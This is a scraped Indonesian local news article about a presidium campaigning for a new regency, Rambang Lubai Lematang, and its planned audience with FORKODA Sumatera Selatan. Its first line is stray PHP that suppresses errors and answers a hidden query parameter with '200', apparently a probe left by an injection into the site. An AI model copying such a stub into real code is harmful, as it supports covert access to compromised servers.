error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Calon Daerah Otonomi Baru Rambang Lubai Lematang Akan Audensi Dengan Ir.Syahrial Oesman.MM Ketua FORKODA SUM-SEL - SMI.COM

Home / PRABUMULIH

Rabu, 4 Januari 2023 - 11:21 WIB

Calon Daerah Otonomi Baru Rambang Lubai Lematang Akan Audensi Dengan Ir.Syahrial Oesman.MM Ketua FORKODA SUM-SEL

Prabumulih, SMI-

 

Presidium Calon Pemekaran Daerah Otonomi Baru (CPDOB),Kabupaten Rambang Lubai Lematang (RLL). Presidium ini diketuai oleh Usman Firiansyah.SH.Menurut rencana segera akan melakukan audensi,ke Forum Kordinasi Daerah (Forkoda) Provinsi Sumatera Selatan Hari Jum’at (06/01/2023).

Tentunya di ikuti para pengurus presidium Rambang Lubai Lematang (RLL), di setiap kecamatan dalam wilayah Rambang Lubai Lematang.Menyiikapi hal tersebut ketua Presidium Pemekaran Calon Kabupaten Rambang Lubai Lematang (RLL) Usman firiansyah.SH, menyampaikan bahwa rencana pertemuan di sekretariat Forum Kordinasi Daerah (Forkoda) Provinsi Sumatera Selatan.Guna untuk Percepatan Pembentukan Daerah Otonomi Baru (PPDOB) Provinsi Sumatera Selatan, Untuk berkoordinasi atas rencana usulan pemekaran kabupaten Rambang Lubai Lematang (RLL).

Berdasarkan informasi yang di peroleh bahwa rencana pertemuan tersebut telah disetujui,oleh sekretariat Forkoda Sumsel yang bertempat di jalan Dr Cipto Kota Palembang.Presidium Calon Daerah Otonomi Baru Rambang Lubai Lematang, bersama pengurus lainnya akan beraudensi dengan Forkoda provinsi Sumatera Selatan.Forkoda Provinsi Sumatera Selatan,yang mana diketuai oleh mantan Gubernur Sumsel Ir.Syahrial Oesman.Presidium Rambang Lubai Lematang telah melayangkan surat,serta telah diterima oleh Forkoda Provinsi Sumatera Selatan. Pada hari Jum’at 6 Januari 2023 ,segera akan dilakukan audensi serta koordinasi antara Presidium RLL dan Forkoda Sumsel.

Baca Juga :  Satlantas Polres Prabumulih Sosialisasikan Tilang E-TLE DI Kota Prabumulih

“Kami telah menerima surat balasan dari Sekretariat Forkoda Sumsel untuk presidium Rambang Lubai Lematang (RLL), balasannya pada hari Jum’at (06/01/23) kita akan Beraudensi guna untuk membahas percepatan pemekaran daerah Rambang Lubai Lematang (RLL),”Ujar Usman Firiansyah.SH Pada hari Selasa (03/01/2023) kemarin.

Lebih lanjut beliau menuturkan bahwa Presidium Rambang Lubai Lematang (RLL),akan siap memperjuangkan aspirasi masyarakat untuk pemekaran Kabupaten Rambang Lubai Lematang (RLL). Dengan menjalin Koordinasi bersama Forum Kordinasi Daerah (Forkoda) Sumsel,karena Forkoda sebagai lembaga percepatan pemekaran daerah otonomi baru.Presidium Rambang Lubai Lematang (RLL),telah sepakat untuk dimekarkan dan sudah menjadi harga mati.

“Daerah Otonomi Baru Kabupaten Rambang Lubai Lematang (RLL),Kami sepakat harga mati.Kami ingin mekar menjadi daerah otonomi baru, karena pemekaran wilayah pada hakekatnya sama yaitu demi pelayanan dan pembangunan yang merata,”Ungkap Usman Firiansyah.SH.

Baca Juga :  PT.BGP lndonesia Bayar Ganti Rugi Lahan Warga Tanjung Raman Prabumulih

Senada dengan itu ketua Presidium Kecamatan Rambang Edy Safari, memberikan penjelasan kepada awak media ini terkait dengan adanya rencana kegiatan Audensi tersebut.

“Mari…. Segenap Pengurus Pusat dan Pengurus Prescamdan terkhusus Prescam Rambang, Serta Koordinator Desa untuk segera melengkapi dukungan lengkap.Mengingat sudah 3 tahun lebih, kelengkapan dukungan masih belum terpenuhi”, Demikian Tandas Edy Safari selaku ketua Presidium Kecamatan Rambang.

Begitu juga dengan Himbauan dan pemberi semangat, kepada seluruh masyarakat untuk selalu berjuang demi tercapainya tujuan bersama.

“Tetap semangat Pejuang-pejuang CDOB RL2…Kalau tidak sekarang kapan lagi,Kalau bukan Kuta siapa lagi..?. Semboyan Semangat Kita adalah Laju…Laju…Laju…. Kabupaten Baru… Harga Mati… ALLAHUAKBAR”, Demikian Tandas Edy Safari memberikan penjelasan kepada awak media ini, hari Rabu (04/01/2023).(Sunar)

Share :

Baca Juga

PRABUMULIH

Ronald Hutahaean Resmi Menjabat Ketua DPC FBI Kota Prabumulih

PRABUMULIH

POLSEK PRABUMULIH BARAT CEGAH TINDAK KEJAHATAN KONVENSIONAL SAMBUT NATAL 2022 DAN TAHUN BARU 2023

PRABUMULIH

MARTODY HS SH MM Kadishub Kota Prabumulih Berikan Izin Resmi Kegiatan Crossing jalan umum PT.BGP SEISMIK 3D CHRYSANT

PRABUMULIH

Kades Sinar Rambang Apresiasi Pengamanan Pilkades Oleh Polres Kota Prabumulih

PRABUMULIH

AKBP.Witdiardi.SIk.MH Wajibkan Anggota Polres Kota Prabumulih Lakukan Strong Poin Di Kota Prabumulih

PRABUMULIH

Jum”at Berkah Berbagi DPC SRIKANDl PP kota Prabumulih

PRABUMULIH

H.Herman Deru Gubernur Sumatera Selatan Lakukan Launching Fungsionalisasi Fly Over Patih Galung Prabumulih Sumatera Selatan

PRABUMULIH

Korban Lakalantas Di Awal Ramadhan 1443 H